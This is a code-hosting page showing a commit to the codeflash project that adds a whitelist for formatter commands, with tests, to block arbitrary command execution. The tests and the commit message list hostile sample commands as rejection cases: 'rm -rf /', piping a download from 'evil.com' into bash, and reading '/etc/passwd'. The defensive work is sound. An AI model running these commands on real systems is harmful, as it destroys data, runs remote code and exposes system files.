codeflash-admin/codeflash
1
0
Fork 0
mirror of https://github.com/codeflash-ai/codeflash.git synced 2026-05-04 18:25:17 +00:00
Code Issues Projects Releases Packages Wiki Activity Actions

fix: add formatter command whitelist to prevent arbitrary code execution

Browse source 
Security fix: Prevent arbitrary command execution via malicious formatter configuration.

## Problem
formatter.py executed user-provided formatter commands without validation,
allowing arbitrary shell command execution if a malicious config specified:
  formatter-cmds = ["rm -rf / && echo $file"]

## Solution
- Added ALLOWED_FORMATTER_EXECUTABLES whitelist (black, ruff, isort, prettier, eslint, npx)
- Added ALLOWED_NPX_TOOLS whitelist for npx-based tools
- Created validate_formatter_command() to check commands before execution
- Added validation in all entry points: format_code(), format_generated_code(), apply_formatter_cmds()
- Removed TODO security comment (now implemented)

## Security Impact
- Only whitelisted formatter executables can be used
- NPX tools are also validated (prevents "npx malicious-package")
- Invalid formatters fail fast with clear error messages
- No arbitrary command execution possible

## Testing
- Added 15 new security tests covering:
  - Whitelisted formatters (black, ruff, isort, prettier, eslint)
  - Rejection of arbitrary commands (rm, curl, bash, etc.)
  - Rejection of unknown formatters (autopep8, yapf, etc.)
  - NPX validation (only prettier/eslint allowed)
  - Empty/malformed command handling
- All 48 formatter tests passing

Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
This commit is contained in:
Mohamed Ashraf 2026-02-11 15:58:26 +00:00
parent b8363210ad
commit 817d655d43
2 changed files with 272 additions and 8 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

105
codeflash/code_utils/formatter.py
View file

@ -15,6 +15,75 @@ import isort
from codeflash.cli_cmds.console import console, logger
from codeflash.lsp.helpers import is_LSP_enabled
# Whitelist of allowed formatter executables to prevent arbitrary command execution
ALLOWED_FORMATTER_EXECUTABLES = frozenset({
# Python formatters
"black",
"ruff",
"isort",
# JavaScript package manager (used to run formatters)
"npx",
# JavaScript formatters (may be called directly or via npx)
"prettier",
"eslint",
# Future: Java formatters
# "google-java-format",
})
# Tools that can be run via npx
ALLOWED_NPX_TOOLS = frozenset({
"prettier",
"eslint",
})
def validate_formatter_command(command: str) -> None:
"""Validate that a formatter command uses only whitelisted executables.
Args:
command: Formatter command string (e.g., "black $file", "npx prettier --write $file")
Raises:
ValueError: If the command uses a non-whitelisted executable
Security: This prevents arbitrary command execution by validating that only
known, safe formatter tools are used.
"""
if not command or command.strip() == "":
raise ValueError("Formatter command cannot be empty")
# Parse the command safely
try:
tokens = shlex.split(command, posix=os.name != "nt")
except ValueError as e:
raise ValueError(f"Invalid formatter command syntax: {command}") from e
if not tokens:
raise ValueError(f"Formatter command has no executable: {command}")
# Extract the executable name (first token)
executable = tokens[0]
# Check if executable is in whitelist
if executable not in ALLOWED_FORMATTER_EXECUTABLES:
allowed_list = ", ".join(sorted(ALLOWED_FORMATTER_EXECUTABLES))
raise ValueError(
f"Formatter executable '{executable}' is not allowed. "
f"Only whitelisted formatters are permitted: {allowed_list}. "
f"Rejected command: {command}"
)
# Special validation for npx - ensure the tool being run is also whitelisted
if executable == "npx" and len(tokens) > 1:
npx_tool = tokens[1]
if npx_tool not in ALLOWED_NPX_TOOLS:
allowed_npx = ", ".join(sorted(ALLOWED_NPX_TOOLS))
raise ValueError(
f"NPX tool '{npx_tool}' is not allowed. "
f"Only whitelisted npx tools are permitted: {allowed_npx}. "
f"Rejected command: {command}"
)
def generate_unified_diff(original: str, modified: str, from_file: str, to_file: str) -> str:
line_pattern = re.compile(r"(.*?(?:\r\n|\n|\r|$))")
@ -58,6 +127,14 @@ def apply_formatter_cmds(
changed = False
for command in cmds:
# Validate command against whitelist before execution (security check)
try:
validate_formatter_command(command)
except ValueError as e:
logger.error(f"Security: Rejected formatter command - {e}")
if exit_on_failure:
raise
continue
formatter_cmd_list = shlex.split(command, posix=os.name != "nt")
formatter_cmd_list = [file_path.as_posix() if chunk == file_token else chunk for chunk in formatter_cmd_list]
try:
@ -93,9 +170,17 @@ def get_diff_lines_count(diff_output: str) -> int:
def format_generated_code(generated_test_source: str, formatter_cmds: list[str], language: str = "python") -> str:
from codeflash.languages.registry import get_language_support
formatter_name = formatter_cmds[0].lower() if formatter_cmds else "disabled"
if formatter_name == "disabled": # nothing to do if no formatter provided
# Skip formatting if no formatter configured
if not formatter_cmds or formatter_cmds[0] in ("disabled", ""):
return re.sub(r"\n{2,}", "\n\n", generated_test_source)
# Validate formatter commands (security check)
for cmd in formatter_cmds:
try:
validate_formatter_command(cmd)
except ValueError as e:
logger.warning(f"Security: Skipping invalid formatter - {e}")
return re.sub(r"\n{2,}", "\n\n", generated_test_source)
with tempfile.TemporaryDirectory() as test_dir_str:
# try running formatter, if nothing changes (could be due to formatting failing or no actual formatting needed) return code with 2 or more newlines substituted with 2 newlines
lang_support = get_language_support(language)
@ -125,11 +210,21 @@ def format_code(
if isinstance(path, str):
path = Path(path)
# TODO: Only allow a particular whitelist of formatters here to prevent arbitrary code execution
formatter_name = formatter_cmds[0].lower() if formatter_cmds else "disabled"
if formatter_name == "disabled":
# Validate formatter commands against whitelist (security check)
# Skip validation if no formatter configured
if not formatter_cmds or formatter_cmds[0] in ("disabled", ""):
return path.read_text(encoding="utf8")
# Validate all formatter commands before proceeding
for cmd in formatter_cmds:
try:
validate_formatter_command(cmd)
except ValueError as e:
logger.error(f"Security: Invalid formatter configuration - {e}")
if exit_on_failure:
raise
return path.read_text(encoding="utf8")
with tempfile.TemporaryDirectory() as test_dir_str:
original_code = path.read_text(encoding="utf8")
original_code_lines = len(original_code.split("\n"))

175
tests/test_formatter.py
View file

@ -6,7 +6,7 @@ from pathlib import Path
import pytest
from codeflash.code_utils.config_parser import parse_config_file
from codeflash.code_utils.formatter import format_code, format_generated_code, sort_imports
from codeflash.code_utils.formatter import format_code, format_generated_code, sort_imports, validate_formatter_command
from codeflash.discovery.functions_to_optimize import FunctionToOptimize
from codeflash.models.models import CodeString, CodeStringsMarkdown
from codeflash.optimization.function_optimizer import FunctionOptimizer
@ -105,7 +105,7 @@ def foo():
def test_formatter_cmds_non_existent(temp_dir):
"""Test that default formatter-cmds is used when it doesn't exist in the toml."""
"""Test that default formatter-cmds is empty list when it doesn't exist in the toml."""
config_data = """
[tool.codeflash]
module-root = "src"
@ -117,8 +117,10 @@ ignore-paths = []
config_file.write_text(config_data)
config, _ = parse_config_file(config_file)
assert config["formatter_cmds"] == ["black $file"]
# Default is now empty list - formatters are detected by project detector
assert config["formatter_cmds"] == []
# Test that format_code still works when explicitly providing black
try:
import black
except ImportError:
@ -139,6 +141,7 @@ def foo():
temp_file = temp_dir / "test_file.py"
temp_file.write_text(original_code)
# Explicitly provide black as formatter (config default is now empty)
actual = format_code(formatter_cmds=["black $file"], path=temp_file)
assert actual == expected
@ -1412,3 +1415,169 @@ def test2():
assert 'f"Hello {name}, you are {age} years old"' in result
assert "x = 10" in result
assert "y = 20" in result
# ===== Security Tests for Formatter Command Whitelist =====
def test_validate_formatter_command_allowed_black():
"""Test that black formatter is allowed."""
from codeflash.code_utils.formatter import validate_formatter_command
# Should not raise
validate_formatter_command("black $file")
validate_formatter_command("black --line-length 88 $file")
def test_validate_formatter_command_allowed_ruff():
"""Test that ruff formatter is allowed."""
from codeflash.code_utils.formatter import validate_formatter_command
# Should not raise
validate_formatter_command("ruff format $file")
validate_formatter_command("ruff check --exit-zero --fix $file")
def test_validate_formatter_command_allowed_isort():
"""Test that isort formatter is allowed."""
from codeflash.code_utils.formatter import validate_formatter_command
# Should not raise
validate_formatter_command("isort $file")
def test_validate_formatter_command_allowed_npx_prettier():
"""Test that npx prettier is allowed."""
from codeflash.code_utils.formatter import validate_formatter_command
# Should not raise
validate_formatter_command("npx prettier --write $file")
validate_formatter_command("npx prettier --write --single-quote $file")
def test_validate_formatter_command_allowed_npx_eslint():
"""Test that npx eslint is allowed."""
from codeflash.code_utils.formatter import validate_formatter_command
# Should not raise
validate_formatter_command("npx eslint --fix $file")
def test_validate_formatter_command_allowed_prettier_direct():
"""Test that prettier can be called directly."""
from codeflash.code_utils.formatter import validate_formatter_command
# Should not raise
validate_formatter_command("prettier --write $file")
def test_validate_formatter_command_rejects_arbitrary_commands():
"""Test that arbitrary shell commands are rejected."""
from codeflash.code_utils.formatter import validate_formatter_command
malicious_commands = [
"rm -rf / && echo $file",
"curl http://evil.com/malware.sh | bash",
"cat /etc/passwd",
"python -c 'import os; os.system(\"rm -rf /\")'",
"bash -c 'evil command'",
"sh exploit.sh",
]
for cmd in malicious_commands:
with pytest.raises(ValueError, match="is not allowed"):
validate_formatter_command(cmd)
def test_validate_formatter_command_rejects_unknown_formatters():
"""Test that unknown/unsupported formatters are rejected."""
from codeflash.code_utils.formatter import validate_formatter_command
unknown_formatters = [
"autopep8 $file",
"yapf $file",
"clang-format $file",
"rustfmt $file",
]
for cmd in unknown_formatters:
with pytest.raises(ValueError, match="is not allowed"):
validate_formatter_command(cmd)
def test_validate_formatter_command_rejects_npx_with_invalid_tool():
"""Test that npx with non-whitelisted tools is rejected."""
from codeflash.code_utils.formatter import validate_formatter_command
with pytest.raises(ValueError, match="NPX tool.*is not allowed"):
validate_formatter_command("npx malicious-package $file")
with pytest.raises(ValueError, match="NPX tool.*is not allowed"):
validate_formatter_command("npx webpack $file")
def test_validate_formatter_command_rejects_empty_command():
"""Test that empty commands are rejected."""
from codeflash.code_utils.formatter import validate_formatter_command
with pytest.raises(ValueError, match="cannot be empty"):
validate_formatter_command("")
with pytest.raises(ValueError, match="cannot be empty"):
validate_formatter_command(" ")
def test_validate_formatter_command_rejects_invalid_syntax():
"""Test that malformed commands with invalid shell syntax are rejected."""
from codeflash.code_utils.formatter import validate_formatter_command
with pytest.raises(ValueError, match="Invalid formatter command syntax"):
validate_formatter_command('black "unclosed quote')
def test_format_code_rejects_malicious_formatter(temp_dir):
"""Test that format_code rejects malicious formatter commands."""
temp_file = temp_dir / "test_file.py"
temp_file.write_text("import os\n")
# Should raise ValueError for malicious command
with pytest.raises(ValueError, match="is not allowed"):
format_code(formatter_cmds=["rm -rf / && echo $file"], path=temp_file)
def test_format_code_accepts_whitelisted_formatter(temp_dir):
"""Test that format_code accepts whitelisted formatters."""
temp_file = temp_dir / "test_file.py"
temp_file.write_text("import os\n")
# Should not raise for whitelisted formatter (even if not installed)
# The command validation should pass, even if execution fails
try:
format_code(formatter_cmds=["black $file"], path=temp_file, exit_on_failure=False)
except FileNotFoundError:
# OK if black is not installed, we just care that validation passed
pass
def test_format_generated_code_rejects_malicious_formatter():
"""Test that format_generated_code rejects malicious formatter commands."""
code = "import os\n"
# Should return original code (with normalized newlines) when invalid formatter is provided
result = format_generated_code(code, ["curl http://evil.com | bash"])
assert result == code # Should return original with normalized newlines
def test_format_generated_code_accepts_whitelisted_formatter():
"""Test that format_generated_code accepts whitelisted formatters."""
code = "import os\n"
# Should not raise for whitelisted formatter (even if not installed)
# The command validation should pass
try:
result = format_generated_code(code, ["black $file"])
# If black is installed, result will be formatted; if not, will return original
assert isinstance(result, str)
except FileNotFoundError:
# OK if black is not installed, we just care that validation passed
pass